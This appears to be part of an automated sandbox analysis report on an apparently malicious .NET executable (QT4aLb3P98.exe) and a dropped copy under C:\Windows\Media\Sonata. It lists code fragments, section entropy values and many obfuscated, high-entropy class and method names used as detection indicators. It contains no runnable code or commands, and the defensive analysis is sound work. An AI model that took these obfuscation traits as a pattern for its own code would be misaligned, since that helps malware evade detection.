Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 11_2_00007FFD9B882BE4 pushad ; retf	11_2_00007FFD9B882C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 12_2_00007FFD9B8BDED8 pushfd ; retf	12_2_00007FFD9B8BDED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Code function: 12_2_00007FFD9B8B2BE4 pushad ; retf	12_2_00007FFD9B8B2C61

Source: QT4aLb3P98.exe	Static PE information: section name: .text entropy: 6.880883233546267
Source: wRRcPdViqk.exe.0.dr	Static PE information: section name: .text entropy: 6.880883233546267
Source: wRRcPdViqk.exe0.0.dr	Static PE information: section name: .text entropy: 6.880883233546267

Source: QT4aLb3P98.exe, JiKg8d856ZjYXmiBYFo.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'SwirFUDDty', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: QT4aLb3P98.exe, w3475uuXHT35IaRI8Bu.cs	High entropy of concatenated method names: 'R7E0qElHL3', 'ltf0OTpAca', 'UY1x80ByerrkSXqqZFE', 'yY0VUHB4NjScUJl9yke', 'zfPFaeBZsrtXtMlxiZv', 'Df9vawBrnViwCtIPRoF', 'jqpLBuBxw3jUF3BBGgm', 'JxsPH7BgMGa4aeDZs1B'
Source: QT4aLb3P98.exe, JIJKCDNsoUDMgsolyUG.cs	High entropy of concatenated method names: 'F6LNTnKW5b', 'EbYebccaAvWCeMGmvkc', 'XPCvR0cFN8xYDhKGnmh', 'iBSuulcowVrlmXv4Wmu', 'u5dO5acmvKB2GesbLvx', 'lXg7ZCcOP1708CPovCp', 'SHqPFic1VvsblYS6DZV', 'G9mwHKchBTCpTr1MiWa', 'Qf6NnIMXY0', 'vKV1Zec5qmnjESYUbcK'
Source: QT4aLb3P98.exe, hctUYkuV0iFJ1dPM067.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'AHFuswBC7JI9bQC8Hb3', 'IVbojOBb50tB27FgGsg', 'C71ahJBkJA4Sa2KH54L', 'MdBNtfBS751QJJ6sKWn'
Source: QT4aLb3P98.exe, SbFE8PN0xa9wA4CIVcp.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'G4BjrVqqIuiUrQTMLHP', 'nZ5mZHqRF1J810eGQfx', 'GOci69q5XgwQU5WZ1uP', 'OUiwyrqcVEPMIrqQOlb', 'IEgBorqJTEBKBZSstEc', 'qsp177qjyyi0mCXy4gt'
Source: QT4aLb3P98.exe, HjgiARybfruwpinHKq.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'XAAvUJDPE', 'NIa45Ca48CQerTx7N8X', 'AiavwmaxHv26R8OKBIF', 'naMuBUags9MmMq4KnG6', 'JLNCndatqAp2fjWc0Fq', 'VYSkpnaBnWYYbDJwVLg'
Source: QT4aLb3P98.exe, aYHCPhZ2Uteq2rb4lxv.cs	High entropy of concatenated method names: 'exbtkwtG6L', 'VE4tc1QZot', 'KGBtzD5Fke', 'oyC8J2Bmrs', 'ft98NOFWHc', 'NfL8ZEYgBs', 'Rdj8uAQfX5', 'MS38t98a7m', 'IdQ888DTLj', 'auXM09SvKFWEOONbevW'
Source: QT4aLb3P98.exe, eaVHe48uTpqvepbPin2.cs	High entropy of concatenated method names: 'YsY2PGKB7NlHCEsv8A0', 'UYd7TMKNu5CHhKIMUP0', 'h6EId6KgKviqG3aR6xm', 'iUj3BpKtyFhFjLItSPM', 'PVuMX6vFYJ', 'MlAZU1K0T6mAPeg2sWU', 'J6M2eFKfrcnmUgBhjj9', 'kW8wGAKEVI4eGb5UsTf', 'r7xAbMKnNJ4dApYh6k3', 'NM37oLKMlIXH0kYJoEC'
Source: QT4aLb3P98.exe, c1dZrVYZZmXaCgA8tdW.cs	High entropy of concatenated method names: 'D0IAU3uo8W', 'fBSA0iLCHn', '_8r1', 'ROyA3RiFmK', 'RamAorlOOK', 'o9OAxuHAOW', 'BwaAmKnksn', 'AuvOgCHSVFqMS0Lmm2p', 'LxEoTDHZ11xsCNjl5Cg', 'uxQ6P3HrefskYwBEvQ4'
Source: QT4aLb3P98.exe, cIhUhU87xqoiS8aIYjc.cs	High entropy of concatenated method names: 'ESnrtupts9', 'J2rr8wqf7x', 'tDZrY3oZ5U', 'CknrKOiUNG', 'LJirUlRH0F', 'dCBr0xFCQZ', 'ksXr34A2sJ', 'Qd3ro3xJg5', 'cRlrxuq8BE', 'JRdrmTR76k'
Source: QT4aLb3P98.exe, xlMfjjSlwWE9ZS9iFb.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'zNLaO0OTT1F35TSI7MR', 'HbiapbOlMTG40aCihLe', 'Jf8vApO3PAKb1m5t7yo', 'f8Kja6OQRnKn4F1Mvse', 'yd2T92OY2DwaaDeOdlN', 'FWLOuNOuPWLHJ0cW4w7'
Source: QT4aLb3P98.exe, Qmn44TubyfFJgaNL5o4.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'q833o8IJJ6', 'eBmeY2LXm0', 'tCa3xAVYYG', 'JhZeasOJ6j', 'gQ3SZRNLl8obTFayyPk', 'kVGQygNACh7MShXhVbx', 'Ellj2MN6CE9Xt3pc9XG'
Source: QT4aLb3P98.exe, wACN0CtwSQcZB5NcoXm.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'ILGjlfSsWj', 'gpjjPb8lqt', 'r8j', 'LS1', '_55S'
Source: QT4aLb3P98.exe, PK7kftNRm6sY0anTonR.cs	High entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'RP0gA9JhmKLU0l7h8FZ', 'Metfq6Jqa9mr5N9DCHq', 'tSQ0yTJRL8gIBUlWY7O', 'n7BtnxJ5ha5N9lpE7Nu', 'ONoL61JODWwhfgkpyh4', 'BvRc4gJ1yBEsAXPmQhW'
Source: QT4aLb3P98.exe, DHbEZIdqePPmX1u5OH.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'e2oj2hF6gEVNvT9l6H4', 'lj7IawFDkiYRKDRlMTr', 'Br8rcZFLvKMu70urn7W', 'BAX2GoFAeSfxuWB4kXx', 'kDjyXSFHXsfIMawrSit', 'l6pDxVFpbqV3JnBDxmZ'
Source: QT4aLb3P98.exe, TPLV12KsWsYNV0yEvc.cs	High entropy of concatenated method names: 'GV142sWsY', 'VvjKt7KvHN6ZwZZCyg', 'f3YXs5dSjyIM1N0hdX', 'g3oHmrwoOpDtfa41jy', 'MZyRYKGtwsGCYyB3DP', 'oOfBX9VgvFysdw0vuD', 'txRZhWtsU', 'WoAuTJMAI', 'IQEtMG9GI', 'pch8Apg3T'
Source: QT4aLb3P98.exe, IvZRi0uWrrwg1ss7Eej.cs	High entropy of concatenated method names: 'HEHU9bKEg2', 'MFZUCj7eOb', 'j2NU7ot0Et', 'qPOUfUGhru', 'jCKU5RBIwy', 'xKNvcithiiegC6GhgLL', 'AHgp6rtq42Im1Hbg3Wa', 'sMIaWBtOedUeBSwmfWO', 'CyEghpt1VRyOr0nESe3', 'q7X3BZtRWyBYOXRJKn8'
Source: QT4aLb3P98.exe, hPlDc6ter0qURk0qvlE.cs	High entropy of concatenated method names: 'kEgmOfeimH', 'sSKmLKd8pv', 'LIfmgT23yD', 'KxPmaQgugU', 'BLhmdIXaGy', 'tID95Z0VUfXxSLGpXNY', 'F4Egmi06BqBHlwWgylV', 'gpjKvi0K49pIWclsABd', 'osv8g80Gr14fii6cgHr', 'Fke1O10D8vmgZEEJvZa'
Source: QT4aLb3P98.exe, XrrMhMtogEHbKEg2iFZ.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: QT4aLb3P98.exe, ekZ8mjNbGSW36MJaG8q.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'GxvLlIJw4xY94CI5AMP', 'lKidG9JKQnIhG6jiqqy', 'NE42s7JGToxvB2hF5xw', 'tWHpG8JVRidcPW7Djv3', 'K7K50LJ6AlLi2vAMN8E', 'Lqiyf7JDc39FgnXvq1Z'
Source: QT4aLb3P98.exe, bgb94uut44YRypTwclP.cs	High entropy of concatenated method names: 'JRVKQ0SjD5', 'ICwKiNdLXI', 'KMqKRcFbPw', 'O4TKTTr5SI', 'kGQKSlOAlQ', 'aP1KnrtS3c', 'pFht6j4sn6jSD4P2Nsy', 'EDGHhL4fHnDOnvE62rt', 't7SHNP4Mn40F4k7twRL', 'zXd8XV488k5fDDZLa7G'
Source: QT4aLb3P98.exe, anDRYVYaCLiATfjJN2T.cs	High entropy of concatenated method names: 'qn92dA7LCH', 'NPWk2RT89Wugw01eHW6', 'cQBClqTd5FdOFX1g2Z8', 'dYl1pBTMDbpSaNfNZ1M', 'BKTimpTsafjkWKtOE9S', '_1fi', 'WYmEb70VkV', '_676', 'IG9', 'mdP'
Source: QT4aLb3P98.exe, eUinWT80SP8jAc4PmKc.cs	High entropy of concatenated method names: 'nILXMwSYrg', 'lE4XeSErdq', 'XinI43690uCFvWKGqNF', 'N5BOjn6vTGQ8SWDYnx8', 'jFLDde6XxXM0MetdI0j', 'eLQFOm62lA5UTPEXJlA', 'a70my16IcDkHfFn43kU', 'jBPawF6iats3tAsJHfb', 'tWHwi46ziF2pu34voaP', 'uNmFb0DoRE4geX8py8o'
Source: QT4aLb3P98.exe, fVfh5iNIrUf9RmULaIe.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'xWp5T2JgnDhw3Dv7IXp', 'BZYJaXJtjP54Avrw1c8', 'IWPEQYJBRasIHFgtdqm', 'J1YRhyJN4XnPD7mDwyR', 'C3rLyqJEERfGiCyo1B1', 'qWMniFJntkKhBcnpXXM'
Source: QT4aLb3P98.exe, LxYlj3vH5GsIITGLXr.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'naEyV9FXBE9mvyg3DG6', 'drDEFAF2VLsrbAON8VL', 'qhslstFIT8FfFyYshWl', 'NhhPt1FiWMTm0dmDcHr', 'jXAV8qFzqC2F7oBpxmu', 'REiO8ROoTpVH7454RB3'
Source: QT4aLb3P98.exe, lXPIdukwBEmOeLRYpZ.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'HBQJ5g19GipCURitN9l', 'qWdSYU1vqH9TAeu14HM', 'A3PyRD1X3cTT7ljVKUK', 'B0oqGX12xRdA99GYqY6', 'UHIiFk1IVO7rUDqjMdg', 'aBkRSQ1i1pXXEgjLO3F'
Source: QT4aLb3P98.exe, mULMhNufXNK1yc83sXD.cs	High entropy of concatenated method names: 'vUGvdkEDntNVJTgIuSJ', 'iFOJ28ELLXClgfRTBCn', 'abJ1adEVYRAJAsMkkJW', 'pvPRYbE6OSFgjLN0BEd', 'IWF', 'j72', 'YoX36m7dj3', 'nfP3WMx0u6', 'j4z', 'tba3GaUq5G'
Source: QT4aLb3P98.exe, Erf1E78qftSV13mX0mt.cs	High entropy of concatenated method names: 'c9TX975iQs', 'yWnXCBkB0s', 'zl3X7fqqtD', 'NeJXfkprFk', 'nBIX5IHDC9', 'ePlXkPMOk8', 'ecgXDjDYqojt1H0h0Kl', 'numLP5D32ZUt8EBmMv1', 'oQD68ODQ8jKKpbITvw6', 'llZak2Dub7GSeApx6Xq'
Source: QT4aLb3P98.exe, btrm2uNF4PVTMitAF2X.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'VKMAssRVim2WfySjIPo', 'QbovDqR6c7tU8DguQcF', 'bwSPCCRDYFPSSXUlu0Q', 'vdEKDNRLrLpXZbUKrZs', 'xOtbJDRAJ600rKiCRyt', 'r7ItIeRHUmXvoII3V8B'
Source: QT4aLb3P98.exe, Fsxaj0uzX7hKAF68yg2.cs	High entropy of concatenated method names: 'U3h3Ejm3wW', 'XP732cKfE0', 'syw3DAJhFP', 'vhtUtiEpYr0474ZUveg', 'N5kU8AEWKqWNxx5SKAW', 'rdlwbpEAeaaANcT6BTN', 'yfwTniEHojTejT9Psvw', 'SZdXxZETLU3Ma9efsmY', 'uqrSXCEl8CMT6cwQ2PD', 'Gh1V5NE31mxnXG6IBT5'
Source: QT4aLb3P98.exe, epvhIfYFT23yDvxPQgu.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'JIJAXSaRO2', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: QT4aLb3P98.exe, lTgdv7YwVg2BDbsrn0n.cs	High entropy of concatenated method names: 'QjoD1JpUk3', '_1kO', '_9v4', '_294', 'yyCDF6qwp6', 'euj', 'fNSDXn1mGO', 'kvuDrEdbJG', 'o87', 'VV0DAPWMIe'
Source: QT4aLb3P98.exe, OllUQkCS5lChLlrMeM.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'LoLlrX1MtulH5sDgx7Y', 'MIbn8U1sOpZgk9thpkC', 'zyFytU18LMc7ppHn3fP', 'gY02ib1dtW6a70yixn8', 'VrAHTm1wIXDy7CAqbMa', 'HNmdpA1KmiQqVwHpnan'
Source: QT4aLb3P98.exe, D78IJCtHbCVIvq91AqO.cs	High entropy of concatenated method names: 'rDE4OtfGZE', 'hEU4LsBG9L', 'iqU4gyYuu5', 'Y4R4aZ0ayU', 'OCt4d0fmwE', 'VxRG3gf4ucGd9ixii8N', 'jApMGafrivaPTJOwCZV', 'mTcMogfy7hN4KaQ3pNt', 'gfDxCFfxkgAsRfhIKoG', 'dIkaq7fgsIJYYTOotMJ'
Source: QT4aLb3P98.exe, aYlFMtA7J7lhuQqVNI.cs	High entropy of concatenated method names: 'sJqLxEdJs', 'eRogMy7No', 'OS1axE0sL', 'tEwFSsmLA9OEeX3Jnyi', 'X2id0xm6qdk5S8ZlLf8', 'mo72RJmD7Ib9GKgAKCv', 'nfXmIJmAr6d9deKIF6n', 'v5jUgQmHBBtvdDFOKnn', 'oo6n04mpkHpr6w1OBFD', 'rFUtBwmWjdrarjbHM5d'
Source: QT4aLb3P98.exe, flIc1DNoiBbuwmOx3RR.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'FG1ySTq4AbR4yjuwjSS', 'GL6HiQqxBSEJguDJkcY', 'IVqarsqgwWNUtowjheL', 'bMFtsSqtFUEHWqGXILT', 'ajUXraqB8Lleu9cd5P6', 'qkaK4mqNAJ9mNE8D7AH'
Source: QT4aLb3P98.exe, cHId7LZdHVnAfl0FcpK.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'MRp8LN7Wdx', 'aTi8gguHId', 'VLH8aVnAfl', 'iFc8dpKnZk', 'mtU8BDKisy', 'F5X1kUr5s4MITaGPBRS', 'WhxnLorcPnkPyqs192E', 'liyTLnrqPLaWWtYBs40'
Source: QT4aLb3P98.exe, WqtexeZGiSmtsK7qtqT.cs	High entropy of concatenated method names: 'Lmwuz8UT4S', 'AMVtJ6NEal', 'mIltNaHcxG', 'WcotZnPkrJ', 'xpftuaAULj', 'aqNttOLJn1', 'AnSt8VkIw5', 'BBqtYKI0mq', 'IT5tKkIn05', 'ChmtUZCCsh'
Source: QT4aLb3P98.exe, ja2QmeuPAK3mjTlXN6X.cs	High entropy of concatenated method names: 'sG4UIjXAFB', 'xwsUwAuaHw', 'aKkUbrrMhM', 'Ip5Y7jg3EJ5Etq0yfVB', 'IYC46DgQO3S3vQAMfMb', 'NInGwVgYW3ZFStY7BPh', 'bQoAQqguKcHMYsWcn0T', 'lKsdDLgUvgFmW9WUt5v', 'hjOFRRgef9esoFLywfx', 'TDlPb8gPHmn2URmt1TV'
Source: QT4aLb3P98.exe, nROr8kt8crAvlKUhJtl.cs	High entropy of concatenated method names: 'iSIx6P1mhD', 'simOn6nyIWNx7uOeNox', 'kVGvdEn4P4621t26iLX', 'A7t5TKnZ25GOgkihLJQ', 'VHxIQFnrO0nM0gyEfJx', 'RMK3sdJ2mn', 'sJd3yreMct', 'GUA3qXD2Tr', 'tn63OKWOlk', 'cRp3LgulRG'
Source: QT4aLb3P98.exe, d5psnfb6IMXY04xdIE.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Xg1GA51kASqd8asKLPl', 'J3oQXE1S3GEjT7T75j3', 'o85eri1ZNwZ2VangPtB', 'bdxSGd1rgT2mMv4j0sj', 'vWRPOO1y147qQtaYq6B', 'u76kZ7140j1f1anacQd'
Source: QT4aLb3P98.exe, YNpWMyYrp8jNaND6rmI.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: QT4aLb3P98.exe, QKVeWAKoKtEC0ldLGfS.cs	High entropy of concatenated method names: 'YFOK6QSSd2ZBt', 'reY0P63kRAv882lQSa1', 'HnLqEQ3SVuDxFunXX4b', 'UAhZmW3ZSK1negTYnu9', 'L30ejE3rSnrocmfpF2h', 'q5BEFV3yCtZ4rTQcGm6', 'EYEC073CquLytO4IkH6', 'mvy5kj3b7AfnKBxfuvN', 'GgURkJ34OS5US5gubR4', 'NSUv9q3xDFYVmi84hJm'
Source: QT4aLb3P98.exe, uHGDcoNLcVrF6ACGrOy.cs	High entropy of concatenated method names: 'LLlNCrMeMx', 'F5ZWsecEMT7YiOYd0yH', 'MhWEMMcnqDsKwnRtpZF', 'sDxG7bcB2dp8PnDeHx6', 'enOqv4cN3GoToyB9Mc6', 'BbMkhJc0jjg8hRmFN1A', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: QT4aLb3P98.exe, OAr2scQ6RB0VjTKZBS.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'XGwEU8OJlwUJ1e6J49q', 'D3voSdOjVb1Dl942GCn', 'AP2Hk0O7XkWMVmwhMNl', 'Ra6GNrOCIhcFP2a6vHC', 'zS2i7yObJtChuEGQkNV', 'lLmHJhOkx34RsnkSMe6'
Source: QT4aLb3P98.exe, yN60qAED4WdDCqN6RK.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'IM1v4FaJsUimr5Z9dJ7', 'NOoXUQajfAGIIwVI2MH', 'CknS7Qa7J0ij4kAQSlc', 'jYcTGxaCSx1IlDi9S1J', 'pSbq6oab276rTSQQ1T3', 'iN1TJEak29IFjH4ebCm'
Source: QT4aLb3P98.exe, JeiOSvYyXaCRGnCCUIu.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'IekHrjWZsT', 'v92HA93EcX', 'KD6HHxlbkf', 'KSvHEgg9PI', 'alVH2TLGxf', 'NgyHDyVNlA', 'qIA8wvWDO9tAMW2xV9y'
Source: QT4aLb3P98.exe, dAxIURupZ07CRji9DC9.cs	High entropy of concatenated method names: 'uds0l6kN0P', 'oDc0P6r0qU', 'Nk006qvlEu', 'yWQxeNtTWSe7ngbZgf2', 'KMfIo9tpLIaCg1nmm7a', 'MVEsUdtWFaapy3vsITH', 'pNxgTCtlEfIBO8r645n', 'nnp0YqlPrq', 'uiX0Keys5r', 'f670Ucyncw'
Source: QT4aLb3P98.exe, i09OH0N8VIih7ZUBEF0.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'qi0BQWh36aCPfrtGI1n', 'palaQJhQsBt6RGHiCkp', 'vXorADhYqZ1u3VCYNcL', 'gg9eTQhuhXTh79Frhvk', 'dncmdahUa16gcd0V3Cd', 'WVoiUchepuEV7likLX3'
Source: QT4aLb3P98.exe, jsTLwvNKogX4E4jqVtA.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'NUPCQbhvpZ86WXpJE5I', 'YClALkhXLH2f0k67p42', 'b4eFpeh2a8mapP5NRn3', 'YGGex9hIhfUFbl4BERr', 'pHJTWwhiKShstXMMAeU', 'aXCGw8hzaZZT4g1ENsc'
Source: QT4aLb3P98.exe, ooDekmYVetHhYPyRjWf.cs	High entropy of concatenated method names: 'G7BAMbvn16', 'clpAeyNZ5A', 'cWyAVS43HT', 'DGRA1uh5nV', 'YHJAFo0BCc', 'ebAQMVH2RUu8Cq3kW4V', 'YZl1QwHI6gGc7Ffjohd', 'VF4nGhHiSRiZd6lNGjg', 'EK1ArZHzWWK6rf4sY4C', 'ubo4jApoObUM5MHNDID'
Source: QT4aLb3P98.exe, OMKN0kN27P6tRpJvd7F.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'Q8VWtD56D32wXKTanhQ', 'Vg5Qn05DjKdlI0g2A8a', 'p9piLA5LYISu3yZKtrO', 'QBAk8c5AfZ3mXoN9BZt', 'XCv1i65H0OpiwKUbnP7', 'MflvNd5pKXQABlH3JIk'
Source: QT4aLb3P98.exe, CUBuDgYOrYnenlHHOMH.cs	High entropy of concatenated method names: 'ihsEPbTOt2CS9P6SAXt', 'yhPBHwT1NIlRDqmluKm', 'jx26qcTaEWTqWDxdlgZ', 'hYxvPXTFfwh9JilcbUo', 'KwaHLCnvTv', 'WM4', '_499', 'zFuHgIyI17', 'mWaHaWbbtf', 'WcLHdVm30Q'
Source: QT4aLb3P98.exe, t1oTv2uR1gYWPhCUSmQ.cs	High entropy of concatenated method names: '_5u9', 'cuRefN7b6l', 'fg43JZgfiW', 'JkteBVtdRa', 'vUOjjtB2RPQxAP3N1e4', 'B3ABBLBIpcsLxHRfeZf', 'sWXkCeBi5VbZIsoxUKn', 'Tw7YKCBvUQPuuVWPI0J', 'iXyhPEBXA4FUTsuweEi', 'ObyH7QBzOwMh9yBB7SC'
Source: QT4aLb3P98.exe, jkav5lNNECc0Odq3fH0.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'G1CwIdh4vTldJCPE5ol', 'cgug8ghxohHAZaAj5RI', 'aVEISDhgsVYFSdLQEk9', 'U26Jslht8RpcqlGo3ps', 'NPK40ThBupgbfHBuG1e', 'GLkKA2hN0pNAoLV70me'
Source: QT4aLb3P98.exe, X1UIGM8c5QLbQq0LLre.cs	High entropy of concatenated method names: 'jeRrED7UPk', 'fKGr2x4yTE', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'BWIrDbQjn0', '_5f9', 'A6Y'
Source: QT4aLb3P98.exe, hXsQGFtX56S1EipSi4v.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'CUB4JuDgrY', '_3il', 'Pen4NlHHOM', 'z5b4ZvWmqp', '_78N', 'z3K'
Source: QT4aLb3P98.exe, wBZWePNrhAL5nVBw9jE.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'LKn8hoRQojvd6PAnBom', 'e8jc8yRYa9SUbTD4ORS', 'IZaGuDRuN7tjwQUXmWm', 'YPmhsBRUpLrCGE9F6Fc', 'P9EfjDRewTETDfIb5cT', 'JGTllURP3h6GfH0xXYP'
Source: QT4aLb3P98.exe, S40dvEuQ7jK72id4wZ7.cs	High entropy of concatenated method names: 'sg9', 'OOuejXs39n', 'goL0kVShta', 'aHxeumoiWS', 'VPQteFBYJVHyXb1taPf', 'khaX5aBu513NFleKRb2', 'RdPYu9BUMyOuIBMdCYa', 'hYpEI8B36TyryscZAst', 'DmiSb5BQYPyQLSgSNgG', 'zG9ZX0Be6x9nv1eUhWN'
Source: QT4aLb3P98.exe, uHHycvNdSFMNNBlbCYv.cs	High entropy of concatenated method names: 'lw6NkviEub', 'NNK1uscDDS5QL9ZiEOt', 'x1diYScLxwdNw63i1m4', 'S5mDoLcVc0MxaUb5KMR', 'O6VLd8c6xvFLPinQwqF', 'bgsi3QcAfadIAhN3f5M', '_3Xh', 'YZ8', '_123', 'G9C'
Source: QT4aLb3P98.exe, Oe87gUNhWxMO6kf13UX.cs	High entropy of concatenated method names: 'SBEZNmOeLR', 'fpZZZQJO31', 'ClNZuLa87D', 'WDxpK3ceR3biXe1kbeV', 'KWHSwrcPWOC8DEeWO8p', 'qAmLxKcu4CAqIoNQ97w', 'IFxkUAcUZkWFNKAN74f', 'RqnGXOc9uTMHNxfduMM', 'W1RSjDcvohEnAMfOKqJ', 'FHEJT3cXNCYMVjv5ys5'
Source: QT4aLb3P98.exe, rhru3CtmKRBIwyOUeKa.cs	High entropy of concatenated method names: 'p0Pxgxnejo', 'YsLxaceU1P', 'f51xdUIGM5', 'MLbxBQq0LL', 'xeTxvtPVC0', 'AiiqkyniW2mBYkylxEj', 'GMJISanzqEQY0cArFrF', 'aHVLxjn2jZjEhGHePZ6', 'lEuSTEnItZDmwceUNeB', 'Qy60800oSZamns9yxCS'
Source: QT4aLb3P98.exe, zXkMSauCe24hAWQcI3t.cs	High entropy of concatenated method names: '_269', '_5E7', 'eaceyl6tPc', 'Mz8', 'MO0eMRxru7', 'JLAjYtNeeO2IOyqARuM', 'qSAVhANPcRZHL5b4eTg', 'SvIoMmN9fqrBVeLHvqY', 'rZhCuANvmjGqxVSxgYV', 'DiYjTWNXImQLrcMgDRK'
Source: QT4aLb3P98.exe, usI4qlZj7gr1SQ2Fg3B.cs	High entropy of concatenated method names: 'XvtufkZ8mj', 'qpPDyybFyJ6CEL2C27T', 'BitJMybOpamnD8pD4y4', 'ThRp0qbm7BbN0m7u9E4', 'UPu4isbaR3Xleamu308', 'qGVgQob1nrteu2pKaeM', 'vycoqFbhe9ZwPISaRe6', 'gr5PPObqZRVf0sV0qDC', 'TJE8sTbRhg4FUyMHJjr', 'aySIrMb5ZyECQOunscC'
Source: QT4aLb3P98.exe, Il9jirNpW9Osd1ujfDE.cs	High entropy of concatenated method names: 'Dc6NDRB0Vj', 'mRPDG9RrlAEtrkCKkZT', 'u9qQMcRy1cGmgiN12VW', 'YrVcGMRScDhPmA5Rdu8', 'R47ippRZw2sJQ1KweXk', 'IMkE1FR4aNM0EdoevO2', 'vXMXpgRxkGvc6ruPh93', 'pyeeyKRgsptXPrQy15Q', 'ch1IrVRtkR348Zd5omE', 'f28'
Source: QT4aLb3P98.exe, Ma3XfBujYuyjOXAUl2p.cs	High entropy of concatenated method names: 'cnpUiGXnmB', 'wlkUR0EtN6', 'v2RUTk8MUQ', 'TLhUSiHjKC', 'dT5x5wgGOkt1eUo9Xct', 'Y3pjQsgV6RhHmxZiNHF', 'kHxqnKg6J971uUUELLx', 'SBllUVgwBXDHAoNCpNc', 'vsNbPmgKyT11TglGRbT', 'iHni5agDbEkvqoF2bsM'
Source: QT4aLb3P98.exe, vxthXMumwQ2XbaEW6BC.cs	High entropy of concatenated method names: '_223', 'P0tkg0grFVb7OfS72Xr', 'QUg0E3gyeBcJdWRoGQg', 'M4oicjg4t0GisVqKA3T', 'tB16uPgxE5m8I7U37Lc', 'cWyCJ1ggi5NCJUTj5RH', 'Lm1TmygtnsEjh2OX4IY', 'jibCfCgBIGlwLh5B7GK', 'OTHnREgNTyhNkG7wcpF', 'UblttLgE7ZpxvsF8GyX'
Source: QT4aLb3P98.exe, Y5E7NeZZnVaGDulYyPU.cs	High entropy of concatenated method names: 'XynZnixJ7c', 'SudZIl9jir', 'q9OZwsd1uj', 'VDEZb6m7fU', 'TRjZ9yvAY1', 'jZrZCuk4nB', 'dHTs0x7rwgIkS0wsae9', 'VlHdKx7yNUhnJTvgqi4', 'yERwDZ7SVFTEnOS3Pdk', 'a5brWK7ZgopT9Fnysxx'
Source: QT4aLb3P98.exe, B1WhZLZcFCKgVBuE9xm.cs	High entropy of concatenated method names: 'gEoKr1GKex', 'L8HJuOyUJOnDEf6VLvf', 'JY5cdmyYsC2cLWsshrF', 'VFMfyZyuceyOJoP63ii', 'bJ680byeQx8g0c2uMqm', 'PPAvgkyPFQUeKqJFlHJ', 'bkTKGU8TUo', 'gLWKpqhT0r', 'MdeKMIVWiN', 'banKeHtXxS'
Source: QT4aLb3P98.exe, imgqEk1NkFVIJTjxyO.cs	High entropy of concatenated method names: 'HqVXK7nOB', 'RqPrbkrhd', 'CKDASULqW', 'GdpHgYlQ8', 'EKTE3L4le', 'euT2cw1ck', 'mPWDpS0sa', 'AZLPO6mRFX0ix3wxIwd', 'L2cCjym5isvoe28DOCa', 'MA4Tu1mcmoSUGlvBv1x'
Source: QT4aLb3P98.exe, bQmmCqtfKYIrsALXgKh.cs	High entropy of concatenated method names: 'ytBlrudUPa', 'xOSlH1UPlh', 'Iuul4nl6BE', 'h2Slj6mcyn', 'b1illye2tM', 'HgFlPERi5S', 'jLGl6EUVUW', 'DrslWkdb8i', 'Oo4lGEyt0B', 'miOlpBYPeg'
Source: QT4aLb3P98.exe, QpqlPrt6qViXeys5rY6.cs	High entropy of concatenated method names: 'fdCmtl0wyl', 'NZjm8bqRwh', 'hjDmYMTp45', 'yytD3t0ZiDRk4XmvFvG', 'uRXbBi0re5Jpvfl30yA', 'LHQUep0kicElrLFvSjO', 'pHGFoU0SPAFa8etd9xW', 'gZg3Fd0yGagScL33Zle', 'V4Z0ye04n2e82sDKNiX', 'MU8pHJ0x76YNIgAwR3B'
Source: QT4aLb3P98.exe, iy1cveKrlv64Wh8Vqjt.cs	High entropy of concatenated method names: 'seDyXnIblI', 'bNXyrvXTlE', 'bPpyAAWZ8L', 'MlGyHk70eY', 'JCAyEFPJKO', 'bshy2p5ksk', 'TtHyDE2j3P', 'NNdys90FkB', 'dUsyytIjuK', 'GwdyqI30Ps'
